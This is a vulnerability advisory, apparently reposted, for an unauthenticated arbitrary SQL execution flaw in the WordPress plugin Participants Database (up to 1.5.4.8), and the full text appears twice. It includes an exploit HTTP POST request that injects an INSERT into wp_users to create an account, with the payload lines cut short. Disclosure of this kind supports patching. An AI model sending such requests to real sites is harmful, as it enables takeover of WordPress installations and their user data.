Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress
==============================
Program: Participants Database <= 1.5.4.8
Severity: Unauthenticated attacker can fully compromise the Wordpress
installation
Permalink: http://www.yarubo.com/
— Info —
Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.
— Vulnerability details —
1. Due to insufficient privilege checks it is possible for anonymous
(unauthenticated) users to trigger some administrative actions If any of
the shortcodes is used (e.g. signup page).
2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated user can
execute arbitrary SQL statements (e.g. create an admin user, read or write
files, or execute code depending on the MySQL user privileges).
— Exploit —
Add a user to wordpress as follows (if you want an admin user, also add
admin privileges to wp_usermeta):
POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data;
boundary=----
------
Content-Disposition: form-data; name="action"
output CSV
------
Content-Disposition: form-data; name="CSV_type"
participant list
------
Content-Disposition: form-data; name="subsource"
participants-database
------
Content-Disposition: form-data; name="query"
INSERT INTO wp_users
(ID,user_login,user_pass,user_
VALUES
(31337,0x74657374,
------
— Solution —
This issue has been fixed in version 1.5.4.9. Download the newest version
from:
https://wordpress.org/plugins/
— Credit —
Yarubo Research Team
research [at] yarubo.com
Network Security Scan:
http://www.yarubo.com/
Free Heartbleed Scan:
http://www.yarubo.com/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
==============================
Program: Participants Database <= 1.5.4.8
Severity: Unauthenticated attacker can fully compromise the Wordpress
installation
Permalink: http://www.yarubo.com/
— Info —
Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.
— Vulnerability details —
1. Due to insufficient privilege checks it is possible for anonymous
(unauthenticated) users to trigger some administrative actions If any of
the shortcodes is used (e.g. signup page).
2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated user can
execute arbitrary SQL statements (e.g. create an admin user, read or write
files, or execute code depending on the MySQL user privileges).
— Exploit —
Add a user to wordpress as follows (if you want an admin user, also add
admin privileges to wp_usermeta):
POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data;
boundary=----
------
Content-Disposition: form-data; name="action"
output CSV
------
Content-Disposition: form-data; name="CSV_type"
participant list
------
Content-Disposition: form-data; name="subsource"
participants-database
------
Content-Disposition: form-data; name="query"
INSERT INTO wp_users
(ID,user_login,user_pass,user_
VALUES
(31337,0x74657374,
------
— Solution —
This issue has been fixed in version 1.5.4.9. Download the newest version
from:
https://wordpress.org/plugins/
— Credit —
Yarubo Research Team
research [at] yarubo.com
Network Security Scan:
http://www.yarubo.com/
Free Heartbleed Scan:
http://www.yarubo.com/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information